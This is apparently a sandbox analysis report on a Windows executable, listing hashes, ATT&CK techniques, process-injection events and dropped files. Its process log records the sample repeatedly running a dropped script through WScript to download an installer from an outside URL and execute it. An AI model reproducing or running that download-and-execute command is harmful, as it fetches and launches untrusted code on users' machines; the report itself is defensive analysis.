1156482b8f1bec82e0b67e0d7cea60501256ef0d75a321d5c068fe1cffe31fe4

Analysis

max time kernel
118s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
11-05-2024 10:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe
Size

184KB
MD5

340ea24d6ed504ce81d6f74cfcd78b2f
SHA1

e40404d9630208c0930c671b1555a92939423908
SHA256

1156482b8f1bec82e0b67e0d7cea60501256ef0d75a321d5c068fe1cffe31fe4
SHA512

a3a1c43a15a878957477aa7078604f381797a37994f427545f27d83942ca71d7855f7854e2a2efa45bd2bf8b9f801012c8753c85f15abd360c9238e25892b884
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3s:/7BSH8zUB+nGESaaRvoB7FJNndnN

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

Processes:

WScript.exeWScript.exeWScript.exeWScript.exeWScript.exe

flow	pid	process
6	1912	WScript.exe
8	1912	WScript.exe
10	1912	WScript.exe
12	2588	WScript.exe
13	2588	WScript.exe
15	3008	WScript.exe
16	3008	WScript.exe
18	1644	WScript.exe
19	1644	WScript.exe
21	476	WScript.exe
22	476	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe

description	pid	process	target process
PID 2008 wrote to memory of 1912	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 1912	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 1912	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 1912	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 2588	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 2588	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 2588	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 2588	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 3008	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 3008	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 3008	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 3008	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 1644	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 1644	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 1644	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 1644	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 476	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 476	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 476	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe
PID 2008 wrote to memory of 476	2008	340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe	WScript.exe

C:\Users\Admin\AppData\Local\Temp\340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\340ea24d6ed504ce81d6f74cfcd78b2f_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2008

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA3ED.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fufA3ED.exe
2⤵
- Blocklisted process makes network request
PID:1912

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA3ED.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fufA3ED.exe
2⤵
- Blocklisted process makes network request
PID:2588

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA3ED.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fufA3ED.exe
2⤵
- Blocklisted process makes network request
PID:3008

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA3ED.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fufA3ED.exe
2⤵
- Blocklisted process makes network request
PID:1644

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA3ED.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fufA3ED.exe
2⤵
- Blocklisted process makes network request
PID:476

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
2a8fa256ce6a53132c6e1887aec2dd90

SHA1
3c3712696c81ffbf3f78767fa642115336718db0

SHA256
4372b48ab69f94556f8124623513fe956790e5250372c13577d51de0a309a2a6

SHA512
86c1a4da1b625219443ffa86cf04f4fa477746d0f1ff2de1c8c8605fcb4eed09b9aa3a7e7a64c8ad59c50b2a65bf25d5ef493bf9b06726ecb83aa9519ef9f11b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
1d71f4b119db5bb534ebcf3ef9500b39

SHA1
a390ae0f3258b38bdffc2f0ac8f3d4e397b737f1

SHA256
1dddfdf5d6f6dae68843986ab704ef2265034a44fe85bdfd5c3b2172bd6350db

SHA512
42774e2c2cad8ef14f25045ced60132e814fd71495ef7015a1773ce4eeff57710487c7bc6b861424689e3f7879ede075bc7b10df04c82cf2bd490bb1b93bfcef

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
2560d57a106b382df3da81a38640fd80

SHA1
dfcb74409c942274fc477e09be665ddac8a97301

SHA256
1a136a5736963318ac89a82784d5c6e81aa4d7a3c387819fbb415c9f9c63500a

SHA512
04e1596cd40bd05b5d73ee0796121b9840964f74e7cd384ad48cb4d560f39d93023956ab5069186f78de3462632bab0ce59ba87045146f995f84358f80d61fd3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
392B

MD5
11bb89890321e38fe7d299d513f2e1af

SHA1
80697e071406470ccb19b2d79a23c201d191b726

SHA256
75733d3c7cfc204af5001aa6f700678d515b27ae9d6d2f8fbbc4ec8cddcf0260

SHA512
b24c925cdf974f8c24f6451f6bca71a452366cfa939438bc2d3ed11ac5e9141593230da58c8beb59dc00532722f5a0d51f78505b8381efae52612a6009290116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm
Filesize
40KB

MD5
d552a8d95a9163cf0598793b488271ee

SHA1
842c9605a992637c0d054754f3567f575c81c1d9

SHA256
16861a28775fba7b3d49514347c3d13f3d921fad66f3a38158b3792e4a72410b

SHA512
bf87d9281e2e263b1532fa36ec0149a99e84a6ac31da1974d34d3aac6d961518599096a9f4f1dd8027f817fae8eec274a59601300d65acb423adb6ca0453f12f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm
Filesize
40KB

MD5
dc9a436112dfd1ce26e36f208a69b2d5

SHA1
615cede934e0d0984c72a84c4813d7ee3a508c3f

SHA256
f60e2e84dbcea335b49df05f73e599db18e161a774c2570b7283cd8c6a74d4c4

SHA512
f382444e9a34c3409f2c1157a3a7472ea746130ade56575e69d382f0861c08202c1321aba6b9f4786ef3364f702fff06ee3c9e6593a8addfd373393de982e2fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm
Filesize
40KB

MD5
eb00b0b1ebaee5d95780eea976ebfd74

SHA1
d18e760a43215380e1fbc716e38ef68e4bc08e9c

SHA256
98a3d4b73696843f008bafd1f2ed63dda7af1cc98cf143abc1bf23035ceac722

SHA512
76a4f8f37a415566b648ff6dcedbb263f661860e1d3559c4caec4d343298dea17412b19256e85a2ceb631df9c17893b028e054cfeb6281bd25b778d27891cdf5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm
Filesize
40KB

MD5
ff36da59d060ad95d8f91cd888fd188d

SHA1
6f55e39faabca3c9492ceb590a3c193b796caa75

SHA256
8fac22b1a212af2fe0d1264f5ccd039e9006eb30d9dfe4332c6526824d774831

SHA512
de7494f1884b45798161081a27d3a0ad1e966867733c9386863a2d1ff59345574e39e338c59688cddcc61d2ffa7e34bfab7242e1c0231a215768f9fb5287efc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm
Filesize
40KB

MD5
ad4eafee365d8869689c578152fda9fc

SHA1
49bb100de31eae7409fe25c6a0619308f2ab21b6

SHA256
8faa39fba6cf0c77cf12c0f08f39b1f40f35253e7af9148df623b9e5b15707f8

SHA512
0993d56438af6bc029fea532df308d9dc280845332ed10bb8b063077e586506c20d679eaf918b58abe64323fba994a391a46d198e561a73ef9e44c73918e320f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabEB78.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar32D.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufA3ED.js
Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\LCQGKNRL.txt
Filesize
175B

MD5
d5990bb98bf254a4ac236137d3531ff9

SHA1
94ddf9e692aeab192734b419c3c942ebf8d93b9d

SHA256
70182b68463c44af9f198c1d7072f84d3ccefaea800c678b70f834bdb55a1855

SHA512
5c85230e836c5f5a639ca815aef44220746aabaeeb0056af53e6378d2ff8db9d7eb7a0601635034a347a09839d51883345c8109ad020afb94fb64c08e1076b06

Download Submit